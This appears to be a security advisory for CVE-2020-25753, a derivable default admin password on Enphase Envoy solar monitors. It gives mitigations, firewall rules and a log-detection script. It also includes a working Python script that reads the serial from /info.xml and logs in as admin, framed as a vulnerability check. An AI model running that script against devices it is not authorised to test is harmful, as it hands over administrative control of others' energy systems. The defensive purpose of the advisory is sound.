CVE-2020-25753

9.8 CRITICAL

📋 TL;DR

Enphase Envoy solar monitoring devices have a default admin password set to the last 6 digits of the device serial number, which can be retrieved by unauthenticated users via the /info.xml endpoint. This allows attackers to gain administrative access to affected devices. All Enphase Envoy R3.x and D4.x devices running v3 software are vulnerable.

💻 Affected Systems

Products:
  • Enphase Envoy R3.x
  • Enphase Envoy D4.x
Versions: v3 software
Operating Systems: Embedded firmware
Default Config Vulnerable: ⚠️ Yes
Notes: Devices whose default admin password has not been changed are vulnerable. The serial number is readable without authentication via the /info.xml endpoint, so anyone who can reach the web interface can derive the password.

⚠️ Risk & Real-World Impact

🔴 Worst Case

Full administrative control of solar monitoring systems, enabling manipulation of energy data, disruption of solar operations, or use as an entry point to internal networks.

🟠 Likely Case

Unauthorized access to solar monitoring data and potential manipulation of energy reporting metrics.

🟢 If Mitigated

Limited impact if strong network segmentation and access controls prevent external access to the devices.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploitation requires only an unauthenticated GET of /info.xml to read the serial number; the last 6 digits are then used as the admin password. No brute force is involved, so the attack leaves at most one login attempt in any log.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Not specified

Vendor Advisory: https://enphase.com/en-us/products-and-services/envoy-and-combiner

Restart Required: No

Instructions:

1. Access Envoy admin interface
2. Change default admin password to a strong, unique password
3. Disable unnecessary services/ports
4. Ensure device is not directly internet-accessible

🔧 Temporary Workarounds

Change Admin Password

Platform: all

Manually change the default admin password to a strong, unique password.

Access the web interface at http://[device-ip]/admin and change the password.

Restrict Network Access

Platform: linux

On the Linux gateway or firewall that routes traffic to the Envoy, allow the management subnet and drop every other client that tries to reach the device's web interface. The rules match traffic destined for the device, so they belong in the FORWARD chain (or ufw route rules), not in INPUT. This does not stop an attacker already on the same LAN segment, so the password still has to be changed.

iptables -A FORWARD -s [mgmt-subnet] -d [device-ip] -p tcp --dport 80 -j ACCEPT
iptables -A FORWARD -d [device-ip] -p tcp --dport 80 -j DROP
ufw route allow from [mgmt-subnet] to [device-ip] port 80 proto tcp
ufw route deny from any to [device-ip] port 80 proto tcp

🧯 If You Can't Patch

  • Implement strict network segmentation to isolate Envoy devices from untrusted networks
  • Monitor for unauthorized access attempts and serial number retrieval from /info.xml endpoint

🔍 How to Verify

Check if Vulnerable:

Fetch http://[device-ip]/info.xml without credentials, read the serial number, and try username admin with the last 6 digits of the serial as the password at http://[device-ip]/admin. A successful login means the device is still on its derived default.

Check Version:

The firmware version is printed on the device label and shown in the web interface footer; the same unauthenticated /info.xml document also reports the running software version.

Verify Fix Applied:

Attempt to access admin interface with old password (should fail) and verify new strong password works
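The "Check if Vulnerable" and "Verify Fix Applied" steps above as one script. This is an added example, not code from the advisory or from Enphase. It assumes the serial number sits at envoy_info/device/sn in /info.xml and that /admin answers with an HTTP Basic or Digest challenge for the user admin; both are assumptions, not facts stated on this page. The embedded /info.xml body is a constructed sample so the parsing and password derivation can be exercised offline; the network functions need a real device and a URL argument.

```python
"""Derive the CVE-2020-25753 default admin password from an Envoy /info.xml
document and, optionally, test it against a device.

Assumptions (not stated in the advisory):
  * the serial number is at envoy_info/device/sn in /info.xml
  * /admin is protected by HTTP Basic or Digest auth, username "admin"
"""
import sys
import urllib.error
import urllib.request
import xml.etree.ElementTree as ET

# Constructed sample of an /info.xml body, used for offline testing only.
SAMPLE_INFO_XML = """<envoy_info>
  <time>1600000000</time>
  <device>
    <sn>121912345678</sn>
    <pn>800-00555-r03</pn>
    <software>R3.9.40</software>
  </device>
</envoy_info>
"""


def extract_serial(info_xml: str) -> str:
    """Return the serial number from an /info.xml body (assumed element path)."""
    root = ET.fromstring(info_xml)
    node = root.find("device/sn")
    if node is None or not (node.text or "").strip():
        raise ValueError("no <device><sn> element found in /info.xml")
    return node.text.strip()


def default_admin_password(serial: str) -> str:
    """Last six digits of the serial number, as the advisory describes the default."""
    digits = "".join(ch for ch in serial if ch.isdigit())
    if len(digits) < 6:
        raise ValueError(f"serial {serial!r} has fewer than six digits")
    return digits[-6:]


def fetch_info_xml(base_url: str, timeout: float = 5.0) -> str:
    """GET /info.xml with no credentials; the endpoint is unauthenticated."""
    url = f"{base_url.rstrip('/')}/info.xml"
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def admin_login_works(base_url: str, password: str, timeout: float = 5.0) -> bool:
    """Try the derived password for user 'admin' against /admin.

    Both a Basic and a Digest handler are registered so that whichever
    challenge the device sends is answered (the scheme is an assumption).
    """
    url = f"{base_url.rstrip('/')}/admin"
    mgr = urllib.request.HTTPPasswordMgrWithDefaultRealm()
    mgr.add_password(None, url, "admin", password)
    opener = urllib.request.build_opener(
        urllib.request.HTTPBasicAuthHandler(mgr),
        urllib.request.HTTPDigestAuthHandler(mgr),
    )
    try:
        with opener.open(url, timeout=timeout) as resp:
            return 200 <= resp.status < 300
    except urllib.error.HTTPError as err:
        if err.code in (401, 403):
            return False  # credentials rejected: default password no longer in use
        raise


def check_device(base_url: str) -> dict:
    """Full check: serial -> derived password -> login attempt."""
    serial = extract_serial(fetch_info_xml(base_url))
    password = default_admin_password(serial)
    return {
        "serial": serial,
        "derived_password": password,
        "vulnerable": admin_login_works(base_url, password),
    }


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"usage: {sys.argv[0]} http://<device-ip>", file=sys.stderr)
        sys.exit(2)
    result = check_device(sys.argv[1])
    print(result)
    # Exit 1 while the derived default still works, 0 once the fix is applied.
    sys.exit(1 if result["vulnerable"] else 0)
```

Run it once before changing the password (expect `vulnerable: True`, exit status 1) and again afterwards (expect `False`, exit status 0); the second run is the "Verify Fix Applied" check. The script stops after a single login attempt per run, so it will not trip account lockout.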

📡 Detection & Monitoring

Log Indicators:

  • A successful admin login with no preceding failed attempts, shortly after a GET /info.xml from the same client. The password is derived rather than guessed, so lockout or failed-login rules alone will miss this attack.
  • Access to the /info.xml endpoint from unauthorized sources

Network Indicators:

  • Unusual traffic patterns to Envoy admin interface
  • External IP addresses accessing /info.xml

SIEM Query:

source_ip=external AND (uri_path="/info.xml" OR uri_path="/admin")

Correlation rule: the same source_ip requesting uri_path="/info.xml" and then, within a short window (for example 10 minutes), uri_path="/admin" with a 2xx status.
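The detection logic above applied to access-log lines. This is an added example, not from the advisory. It assumes Common Log Format records from a reverse proxy or network sensor placed in front of the Envoy (the device itself is not assumed to produce such logs); the log lines, the 10-minute window, and the private address ranges used to classify a client as external are all constructed or chosen here for illustration.

```python
"""Flag the two-step CVE-2020-25753 pattern in web access logs:
an unauthenticated GET /info.xml followed, from the same client and within a
short window, by a successful request to /admin. External clients fetching
/info.xml at all are reported separately.

Assumes Common Log Format lines from a proxy or sensor in front of the
device. SAMPLE_LOG is constructed for this example.
"""
import ipaddress
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample: one external client performing the attack sequence,
# one internal client whose /admin visit is far too late to correlate,
# and one unrelated request.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Oct/2020:10:15:01 +0000] "GET /info.xml HTTP/1.1" 200 812
203.0.113.7 - - [12/Oct/2020:10:15:09 +0000] "GET /admin HTTP/1.1" 401 0
203.0.113.7 - - [12/Oct/2020:10:15:10 +0000] "GET /admin HTTP/1.1" 200 4410
192.168.1.20 - - [12/Oct/2020:10:20:00 +0000] "GET /info.xml HTTP/1.1" 200 812
192.168.1.20 - - [12/Oct/2020:11:45:00 +0000] "GET /admin HTTP/1.1" 200 4410
198.51.100.9 - - [12/Oct/2020:12:00:00 +0000] "GET /production.json HTTP/1.1" 200 300
"""

# Address ranges treated as internal (assumed; adjust to the real network).
INTERNAL = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
]


def is_external(ip: str) -> bool:
    """True when the client address is outside the assumed internal ranges."""
    addr = ipaddress.ip_address(ip)
    return not addr.is_loopback and not any(addr in net for net in INTERNAL)


def find_indicators(log_text: str, window: timedelta = timedelta(minutes=10)) -> list:
    """Return findings in log order.

    rule "external_info_xml": an external client read /info.xml.
    rule "info_xml_then_admin": a 2xx /admin response to a client that read
    /info.xml within `window` beforehand (the derived-password login pattern).
    """
    info_hits = defaultdict(list)  # ip -> timestamps of /info.xml requests
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip = m["ip"]
        path = m["path"].split("?", 1)[0]
        status = int(m["status"])
        ts = datetime.strptime(m["ts"], TS_FMT)
        if path == "/info.xml":
            info_hits[ip].append(ts)
            if is_external(ip):
                findings.append({"ip": ip, "at": ts, "rule": "external_info_xml"})
        elif path.startswith("/admin") and 200 <= status < 300:
            recent = [t for t in info_hits[ip] if ts - window <= t <= ts]
            if recent:
                findings.append({
                    "ip": ip,
                    "at": ts,
                    "rule": "info_xml_then_admin",
                    "seconds_after_info_xml": int((ts - max(recent)).total_seconds()),
                })
    return findings


if __name__ == "__main__":
    for f in find_indicators(SAMPLE_LOG):
        print(f)
```

Only 2xx responses to /admin count as the second step, so the 401 that precedes a successful Basic or Digest exchange does not produce a duplicate finding, and the internal client whose /admin visit comes 85 minutes after its /info.xml read stays below the threshold.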
